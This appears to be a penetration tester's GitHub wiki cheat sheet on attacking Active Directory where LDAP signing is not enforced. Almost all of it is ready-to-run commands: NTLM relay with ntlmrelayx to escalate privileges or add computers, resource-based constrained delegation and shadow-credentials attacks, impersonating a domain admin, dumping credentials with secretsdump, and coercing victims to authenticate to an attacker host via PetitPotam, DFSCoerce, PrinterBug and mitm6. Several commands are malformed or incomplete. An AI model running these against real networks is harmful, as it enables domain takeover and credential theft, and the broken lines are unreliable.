LDAP Signing - CraigDonkin/Infrastructure GitHub Wiki
nxc.exe ldap <server> -u <username> -p <password> -M ldap-checker
python3 LdapRelayScan.py -method LDAPS -dc-ip <ip> -u <username> -p <password>
https://github.com/zyn3rgy/LdapRelayScan
- Relay to enumerate information
python3 ntlmrelayx.py -t ldap://<DC IP>
- If relaying from SMB
python3 ntlmrelayx.py -t ldap://<DC IP> -smb2support
- Relay to escalate privileges. For example if relaying a DA
python3 ntlmrelayx.py -t ldap://<DC IP> --escalate-user <username>
- Interactive LDAP shell
python3 ntlmrelayx.py -t ldaps://<DC IP> -i
- Add a computer to domain
python3 ntlmrelayx.py -t ldaps://<DC IP> --add-computer <computername>
- RBCD
python3 ntlmrelayx.py -t ldaps://<DC IP> --delegate-access
getST.py -spn CIFS/<server name> '<computer you created>$ -impersonate <user to impersonate>
export KRB5CCNAME=<blah.ccache>
secretsdump.py -k -no-pass <dc>
*Shadow Credential attack
python3 ntlmrelayx.py -t ldaps://<DC IP> --shadow-credentials
python3 gettgtpkinit.py -cert-pfx <pfx> -pfx-pass <password <computer>$ <output.ccache>
export KRB5CCNAME=<output.ccache>
python3 getnthash.py '$' -key
- Remove MIC (NTLMv1), then perform RBCD attack
python3 ntlmrelayx.py -t ldaps://<DC IP> --remove-mic -smb2support --delegate-access
getST.py -spn cifs/[RELAYED DC] -impersonate [DOMAIN ADMIN] [CREATED COMPUTER]':[PASSWORD]
- PetitPotam/DFSCoerce/PrinterBug etc
python3 PetitPotam.py -u <username> -p <password> -d <domain name> <attackerhost> <victim>
python3 dfscoerce.py -u <username> -p <password> -d <domain name> -dc-ip <dc-ip> <attackerhost> <victim>
python printerbug.py <DOMAIN/USER:PASSWORD@TARGET> <attackerhost>
- MITM6
sudo mitm6 -d <domain> --ignore-nofqdn
- WebClient
python3 PetitPotam.py -u <username> -p <password> -d <domain name> <attackerhost>@80/abc <victim>